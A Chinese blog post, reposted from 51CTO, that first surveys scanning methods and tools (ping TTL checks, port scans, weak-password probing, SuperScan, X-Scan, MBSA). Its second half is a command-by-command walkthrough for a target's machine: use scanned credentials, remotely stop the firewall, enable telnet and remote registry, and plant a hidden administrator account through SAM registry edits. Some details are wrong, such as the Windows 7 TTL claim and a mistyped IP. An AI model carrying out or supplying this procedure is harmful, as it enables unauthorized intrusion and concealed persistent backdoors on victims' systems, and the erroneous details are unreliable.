扫描技术和扫描工具

简介:

第2章-扫描技术

一、扫描技术概述

描描指的是利用工具软件来探测目标网络或主机的过程,其目的只有一个:为即将采取的攻击或防御行动收集情报

(1)、扫描原理

1、ping检测

Øping命令是最常用的网络连接诊断工具,当然也可作为最基础的扫描工具

Ø利生ICMP协议的响应机制,可以对目标IP地址、主机在线情况、操作系统类型等信息作出初步判断

【ping来判断目标主机的操作系统情况】

a)TTL值趋近于128:windows XP/windows server 2000/windows server 2003

b)TTL值趋近于64 :windows 7/windows 2008

c)TTL值趋近于255:交换机、路由器等设备

如下图所示

124946212.jpg


2、端口扫描

Ø主要针对特定的网络服务进行探测,尝试连接目标主机的特定端口,根据反馈结果来判断是否开启指定服务

Ø分类:TCP端口扫描、UDP端口扫描

【TCP端口扫描】

会向对方发送一个请求或终止访问的数据包,若对方给出正常回应,则表示目标服务开启,否则表示端口关闭或可能被防火墙拦截

【UDP端口扫描】

通常会发送一个空数据包,若反馈错误消息,则表示目标服务开启,否则会告知端口不可达

【命令格式】

   telnet ip地址端口号如“telnet  192.168.4.17 21”

如下图所示

124957411.jpg


3、OS探测

Ø也就是操作系统(Operating System)探测,指的是获取目标主机所使用的操作系统类型,版本等相关信息的过程

Ø探测试式:随便访问一个不存在的网页,通常能够在出错页面上得到web服务程序的版本信息

如下图所示

125004795.jpg


4、弱口令探测

Ø弱口令探测的方式类似于暴力破解,只不过并不尝试所有可能的密码,而只是尝试安全性极差的密码,如“abc123、123456”等

5、漏洞评估

Ø漏洞评估(或称弱点评估),一般用在正面的系统安全加固工作中,主要针对服务器系统各种已知的漏洞进行检测,同时对各种公认的或潜在的见险进行摸拟,从而全面判断目标主机的安全性

Ø漏洞评估通常由一系列独立的扫描插件来执行,而并不是单一的扫描任务

(2)、常见的扫描工具

1、SuperScan

一款免费的TCP/UDP端口扫描工具,网址“www.foundstone.com”

2、Fluxay(流光)

由国内的“小榕软件实验室”开发的一款强大的集成扫描软件,网址“www.netxeyes.com”

3、X-Scan

由国内的“安全焦点”出品的漏洞检洞工具,网址“www.xfocus.net”

4、MBSA

   MBSA全称“Microsoft BaselineSecurity Analyzer”微软基准安全分析

器,由微软公司开发的一款免费的操作系统安全评估工具,网址“www.microsoft.com”

5、Wikto

在Windows平台运行的Web弱点扫描工具,采用C#语言编写,网址

“www.sensepost.com”

二、创建隐藏用户的方法

本案例是用在被攻击者主机上创建,也可在自己的主机上创建


1、用扫描工具获取到对方的账户和密码

2、用获取到的账户和密码先进入系统(假如对方IP为192.168.10.10,扫描到的密码为123456)

   net use \\1962.168.10.10  /user:administrator 123456

3、远程关闭对方的防火墙

   sc \\192.168.10.10  stop  sharedaccess

4、远程开启对方的远程服务

   sc \\192.168.10.10  start  tlntsvr start= auto

   sc \\192.168.10.10  start  tlntsvr

5、远程开启对方的注册表服务

   sc \\192.168.10.10  config  remoteregistry  start= auto

   sc \\192.168.10.10  start  remoteregistry

6、远程登录系统

   telnet 192.168.10.10

7、创建隐藏用户(假如取名为benet)

   net user  benet$  123456 /add

8、打开本地注册表(regedit)

选择“文件”→→选择"连接到网络注册表"→→输入“对方IP:192.168.10.10”→→点击进入

9、赋予完全控制权限并编辑注册表

   HKEY_LOCAL_MACHINE→SAM→SAM→Domain→Account

      users:权限(F)、功能(V)在这个选项里

      Names:账户在这个选项里

把管理员权限(ox1-F4)“0000001F4”复制给benet用户(0x3eb)“0000003EB”

10、在导出benet用户的“Names”和“Users”

说白了就是做个备份,导入位置随便哪都行

11、远程删除benet用户

   net user  benet$  /del

12、最后,在导入刚才导出的benet用户

13、隐藏用户创建成功


《注意》:如果是在本地创建的话,前面6步就可以省略,直接从第7步开始


本文转自甘兵 51CTO博客,原文链接:http://blog.51cto.com/ganbing/1258688,如需转载请自行联系原作者

相关文章
|
安全 网络协议 物联网
GOBY扫描篇
GOBY扫描篇
972 0
GOBY扫描篇
|
2月前
扫描工具 -- Nuclei
扫描工具 -- Nuclei
67 0
|
2月前
|
JavaScript 开发工具 Docker
扫描工具 -- ReconNote
扫描工具 -- ReconNote
15 0
|
消息中间件 安全 网络协议
综合扫描 -- Ladon
综合扫描 -- Ladon
255 0
综合扫描 -- Ladon
|
网络协议
综合扫描工具 -- dmitry
综合扫描工具 -- dmitry
123 0
综合扫描工具 -- dmitry
|
SQL 安全 网络协议
第二轮学习笔记: 扫描工具 -- nmap信息收集
第二轮学习笔记: 扫描工具 -- nmap信息收集
113 0
第二轮学习笔记: 扫描工具 -- nmap信息收集
|
Scala 开发者 索引
扫描 | 学习笔记
快速学习扫描
60 0
|
JSON 安全 NoSQL
微信扫描登录(获取扫描人信息分析) | 学习笔记
快速学习 微信扫描登录(获取扫描人信息分析)
205 0
微信扫描登录(获取扫描人信息分析) | 学习笔记
|
安全 网络协议 算法
浅析四种Web漏洞扫描技术
Web的开放性广受大家的欢迎,但是同时Web系统将面临着入侵攻击的威胁。我们一直希望建立一个安全的Web系统,但是完全安全几乎是不可能实现的,但是相对的安全是可以达到的。其中进行Web漏洞扫描就是建立Web安全的一个重要保障。
1024 1